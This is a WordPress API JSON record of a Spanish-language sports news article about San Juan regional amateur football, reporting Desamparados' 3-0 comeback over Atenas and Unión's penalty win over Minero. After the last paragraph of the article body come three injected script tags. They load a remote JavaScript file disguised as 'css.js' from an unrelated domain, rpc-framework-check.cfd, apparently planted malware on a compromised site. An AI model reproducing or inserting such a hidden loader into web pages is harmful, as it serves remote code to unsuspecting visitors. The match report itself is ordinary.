{"id":22030,"date":"2025-01-06T15:09:13","date_gmt":"2025-01-06T18:09:13","guid":{"rendered":"https:\/\/www.sanjuandeportes.com\/wp\/?p=22030"},"modified":"2026-02-02T19:21:14","modified_gmt":"2026-02-02T22:21:14","slug":"desamparados-y-union-hicieron-hazana","status":"publish","type":"post","link":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/01\/06\/desamparados-y-union-hicieron-hazana\/","title":{"rendered":"Desamparados y Uni\u00f3n hicieron haza\u00f1a"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\"><strong>Sportivo Desamparados<\/strong>&nbsp;vivi\u00f3 una noche de pura emoci\u00f3n en el Estadio Serpentario al imponerse por 3-0 frente a&nbsp;<strong>Atenas de Pocito<\/strong>, asegurando su lugar en la pr\u00f3xima fase del<strong>&nbsp;Torneo Regional Amateur.<\/strong>&nbsp;Con este triunfo, el equipo puyutano&nbsp;<strong>revirti\u00f3 el 1-3<\/strong>&nbsp;sufrido en el partido de ida y sigue so\u00f1ando con la final.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">El encuentro tuvo a&nbsp;<strong>Desamparados<\/strong>&nbsp;como protagonista. La primera anotaci\u00f3n lleg\u00f3 al inicio del complemento, a los 2 minutos, con un gol de&nbsp;<strong>Omar Benavidez<\/strong>&nbsp;que abri\u00f3 el marcador. Minutos despu\u00e9s,&nbsp;<strong>Franco L\u00e9pez<\/strong>&nbsp;ampli\u00f3 la ventaja al 11&#8243;, fortaleciendo el dominio del equipo local.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">El momento m\u00e1s destacado de la noche fue el golazo de&nbsp;<strong>Marcelo \u00abEl Gato\u00bb Guajardo,<\/strong>&nbsp;quien desde fuera del \u00e1rea coloc\u00f3 la pelota en el \u00e1ngulo, dejando sin reacci\u00f3n al arquero rival y desatando la alegr\u00eda en las tribunas. Por su parte,&nbsp;<strong>Atenas<\/strong>&nbsp;sufri\u00f3 la expulsi\u00f3n de&nbsp;<strong>C\u00e1seres,<\/strong>&nbsp;lo que complic\u00f3 a\u00fan m\u00e1s su desempe\u00f1o.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">En Rawson<strong>,Uni\u00f3n<\/strong>&nbsp;tambi\u00e9n logr\u00f3 avanzar al superar a&nbsp;<strong>Minero<\/strong>&nbsp;por 3-1 en los 90 minutos. Durante el tiempo regular, el Azul se puso al frente 2-1, destacando el gol de&nbsp;<strong>Gim\u00e9nez<\/strong>&nbsp;cerca del final del segundo tiempo, que parec\u00eda sentenciar el partido. Sin embargo, Minero logr\u00f3 igualar la serie global, llevando la definici\u00f3n a los penales.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">La tanda desde los doce pasos,&nbsp;<strong>Uni\u00f3n<\/strong>&nbsp;mostr\u00f3 mayor eficacia y&nbsp;<strong>gan\u00f3 4-3<\/strong>,logrando la heroica y desatando la alegr\u00eda de su hinchas.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Ahora,&nbsp;<strong>Desamparados<\/strong>&nbsp;y&nbsp;<strong>Uni\u00f3n<\/strong>&nbsp;se enfrentar\u00e1n en una&nbsp;<strong>semifinal<\/strong>&nbsp;infartante por un boleto a la&nbsp;<strong>gran final<\/strong>&nbsp;del torneo. Ambos equipos llegan con confianza tras superar&nbsp;<strong>obst\u00e1culos importantes,<\/strong>&nbsp;y la expectativa crece entre los hinchas de ambas instituciones.<\/p>\n<script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script>","protected":false},"excerpt":{"rendered":"<p>Sportivo Desamparados&nbsp;vivi\u00f3 una noche de pura emoci\u00f3n en el Estadio Serpentario al imponerse por 3-0 frente a&nbsp;Atenas de Pocito, asegurando su lugar en la pr\u00f3xima fase del&nbsp;Torneo Regional Amateur.&nbsp;Con este triunfo, el equipo puyutano&nbsp;revirti\u00f3 el 1-3&nbsp;sufrido en el partido de ida y sigue so\u00f1ando con la final. El encuentro tuvo a&nbsp;Desamparados&nbsp;como protagonista. La primera anotaci\u00f3n [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":22031,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[48,24,182,178],"tags":[],"class_list":["post-22030","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-destacada","category-futbol","category-regional-amateur","category-san-juan"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v28.2 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Desamparados y Uni\u00f3n hicieron haza\u00f1a - San Juan Deportes<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.sanjuandeportes.com\/wp\/2025\/01\/06\/desamparados-y-union-hicieron-hazana\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Desamparados y Uni\u00f3n hicieron haza\u00f1a - San Juan Deportes\" \/>\n<meta property=\"og:description\" content=\"Sportivo Desamparados&nbsp;vivi\u00f3 una noche de pura emoci\u00f3n en el Estadio Serpentario al imponerse por 3-0 frente a&nbsp;Atenas de Pocito, asegurando su lugar en la pr\u00f3xima fase del&nbsp;Torneo Regional Amateur.&nbsp;Con este triunfo, el equipo puyutano&nbsp;revirti\u00f3 el 1-3&nbsp;sufrido en el partido de ida y sigue so\u00f1ando con la final. El encuentro tuvo a&nbsp;Desamparados&nbsp;como protagonista. La primera anotaci\u00f3n [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.sanjuandeportes.com\/wp\/2025\/01\/06\/desamparados-y-union-hicieron-hazana\/\" \/>\n<meta property=\"og:site_name\" content=\"San Juan Deportes\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/sanjuandeportesok\" \/>\n<meta property=\"article:published_time\" content=\"2025-01-06T18:09:13+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-02-02T22:21:14+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/01\/desaaa.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1069\" \/>\n\t<meta property=\"og:image:height\" content=\"709\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@SanJuanDeportes\" \/>\n<meta name=\"twitter:site\" content=\"@SanJuanDeportes\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/01\\\/06\\\/desamparados-y-union-hicieron-hazana\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/01\\\/06\\\/desamparados-y-union-hicieron-hazana\\\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/person\\\/d8e3463931719391897f9c7a6d1bb7b3\"},\"headline\":\"Desamparados y Uni\u00f3n hicieron haza\u00f1a\",\"datePublished\":\"2025-01-06T18:09:13+00:00\",\"dateModified\":\"2026-02-02T22:21:14+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/01\\\/06\\\/desamparados-y-union-hicieron-hazana\\\/\"},\"wordCount\":334,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/01\\\/06\\\/desamparados-y-union-hicieron-hazana\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2025\\\/01\\\/desaaa.jpg\",\"articleSection\":[\"destacada\",\"Futbol\",\"Regional Amateur\",\"San Juan\"],\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/01\\\/06\\\/desamparados-y-union-hicieron-hazana\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/01\\\/06\\\/desamparados-y-union-hicieron-hazana\\\/\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/01\\\/06\\\/desamparados-y-union-hicieron-hazana\\\/\",\"name\":\"Desamparados y Uni\u00f3n hicieron haza\u00f1a - San Juan Deportes\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/01\\\/06\\\/desamparados-y-union-hicieron-hazana\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/01\\\/06\\\/desamparados-y-union-hicieron-hazana\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2025\\\/01\\\/desaaa.jpg\",\"datePublished\":\"2025-01-06T18:09:13+00:00\",\"dateModified\":\"2026-02-02T22:21:14+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/01\\\/06\\\/desamparados-y-union-hicieron-hazana\\\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/01\\\/06\\\/desamparados-y-union-hicieron-hazana\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/01\\\/06\\\/desamparados-y-union-hicieron-hazana\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2025\\\/01\\\/desaaa.jpg\",\"contentUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2025\\\/01\\\/desaaa.jpg\",\"width\":1069,\"height\":709},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/01\\\/06\\\/desamparados-y-union-hicieron-hazana\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Desamparados y Uni\u00f3n hicieron haza\u00f1a\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#website\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\",\"name\":\"San Juan Deportes\",\"description\":\"El sitio de deportes de la provincia de San Juan\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\",\"name\":\"San Juan Deportes\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/unnamed.jpg\",\"contentUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/unnamed.jpg\",\"width\":900,\"height\":900,\"caption\":\"San Juan Deportes\"},\"image\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/sanjuandeportesok\",\"https:\\\/\\\/x.com\\\/SanJuanDeportes\",\"https:\\\/\\\/www.instagram.com\\\/sanjuandeportes\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/person\\\/d8e3463931719391897f9c7a6d1bb7b3\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/author\\\/admin\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Desamparados y Uni\u00f3n hicieron haza\u00f1a - San Juan Deportes","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/01\/06\/desamparados-y-union-hicieron-hazana\/","og_locale":"es_ES","og_type":"article","og_title":"Desamparados y Uni\u00f3n hicieron haza\u00f1a - San Juan Deportes","og_description":"Sportivo Desamparados&nbsp;vivi\u00f3 una noche de pura emoci\u00f3n en el Estadio Serpentario al imponerse por 3-0 frente a&nbsp;Atenas de Pocito, asegurando su lugar en la pr\u00f3xima fase del&nbsp;Torneo Regional Amateur.&nbsp;Con este triunfo, el equipo puyutano&nbsp;revirti\u00f3 el 1-3&nbsp;sufrido en el partido de ida y sigue so\u00f1ando con la final. El encuentro tuvo a&nbsp;Desamparados&nbsp;como protagonista. La primera anotaci\u00f3n [&hellip;]","og_url":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/01\/06\/desamparados-y-union-hicieron-hazana\/","og_site_name":"San Juan Deportes","article_publisher":"https:\/\/www.facebook.com\/sanjuandeportesok","article_published_time":"2025-01-06T18:09:13+00:00","article_modified_time":"2026-02-02T22:21:14+00:00","og_image":[{"width":1069,"height":709,"url":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/01\/desaaa.jpg","type":"image\/jpeg"}],"author":"admin","twitter_card":"summary_large_image","twitter_creator":"@SanJuanDeportes","twitter_site":"@SanJuanDeportes","twitter_misc":{"Escrito por":"admin","Tiempo de lectura":"2 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/01\/06\/desamparados-y-union-hicieron-hazana\/#article","isPartOf":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/01\/06\/desamparados-y-union-hicieron-hazana\/"},"author":{"name":"admin","@id":"https:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/person\/d8e3463931719391897f9c7a6d1bb7b3"},"headline":"Desamparados y Uni\u00f3n hicieron haza\u00f1a","datePublished":"2025-01-06T18:09:13+00:00","dateModified":"2026-02-02T22:21:14+00:00","mainEntityOfPage":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/01\/06\/desamparados-y-union-hicieron-hazana\/"},"wordCount":334,"commentCount":0,"publisher":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/#organization"},"image":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/01\/06\/desamparados-y-union-hicieron-hazana\/#primaryimage"},"thumbnailUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/01\/desaaa.jpg","articleSection":["destacada","Futbol","Regional Amateur","San Juan"],"inLanguage":"es","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.sanjuandeportes.com\/wp\/2025\/01\/06\/desamparados-y-union-hicieron-hazana\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/01\/06\/desamparados-y-union-hicieron-hazana\/","url":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/01\/06\/desamparados-y-union-hicieron-hazana\/","name":"Desamparados y Uni\u00f3n hicieron haza\u00f1a - San Juan Deportes","isPartOf":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/01\/06\/desamparados-y-union-hicieron-hazana\/#primaryimage"},"image":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/01\/06\/desamparados-y-union-hicieron-hazana\/#primaryimage"},"thumbnailUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/01\/desaaa.jpg","datePublished":"2025-01-06T18:09:13+00:00","dateModified":"2026-02-02T22:21:14+00:00","breadcrumb":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/01\/06\/desamparados-y-union-hicieron-hazana\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.sanjuandeportes.com\/wp\/2025\/01\/06\/desamparados-y-union-hicieron-hazana\/"]}]},{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/01\/06\/desamparados-y-union-hicieron-hazana\/#primaryimage","url":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/01\/desaaa.jpg","contentUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/01\/desaaa.jpg","width":1069,"height":709},{"@type":"BreadcrumbList","@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/01\/06\/desamparados-y-union-hicieron-hazana\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"http:\/\/www.sanjuandeportes.com\/wp\/"},{"@type":"ListItem","position":2,"name":"Desamparados y Uni\u00f3n hicieron haza\u00f1a"}]},{"@type":"WebSite","@id":"https:\/\/www.sanjuandeportes.com\/wp\/#website","url":"https:\/\/www.sanjuandeportes.com\/wp\/","name":"San Juan Deportes","description":"El sitio de deportes de la provincia de San Juan","publisher":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.sanjuandeportes.com\/wp\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Organization","@id":"https:\/\/www.sanjuandeportes.com\/wp\/#organization","name":"San Juan Deportes","url":"https:\/\/www.sanjuandeportes.com\/wp\/","logo":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/logo\/image\/","url":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/unnamed.jpg","contentUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/unnamed.jpg","width":900,"height":900,"caption":"San Juan Deportes"},"image":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/sanjuandeportesok","https:\/\/x.com\/SanJuanDeportes","https:\/\/www.instagram.com\/sanjuandeportes"]},{"@type":"Person","@id":"https:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/person\/d8e3463931719391897f9c7a6d1bb7b3","name":"admin","image":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/secure.gravatar.com\/avatar\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g","caption":"admin"},"url":"https:\/\/www.sanjuandeportes.com\/wp\/author\/admin\/"}]}},"_links":{"self":[{"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/22030","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/comments?post=22030"}],"version-history":[{"count":4,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/22030\/revisions"}],"predecessor-version":[{"id":29180,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/22030\/revisions\/29180"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/media\/22031"}],"wp:attachment":[{"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/media?parent=22030"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/categories?post=22030"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/tags?post=22030"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}